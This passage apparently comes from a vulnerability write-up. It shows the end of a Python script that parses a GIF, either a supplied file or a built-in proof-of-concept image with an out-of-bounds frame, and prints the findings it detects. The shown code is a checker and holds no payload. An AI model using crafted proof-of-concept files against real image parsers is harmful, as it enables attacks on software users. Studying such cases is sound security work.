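    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_gif(POC_IMAGE_LEFT)
    result = parse_gif(raw)
    print("screen", result["screen"], "images", result["images"])
    for finding in result["findings"]:
        print("FINDING:", finding)
```

Pass the path of the crafted.gif written by the script above as the first argument to run the same check against the actual PoC file instead of the constructed sample.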

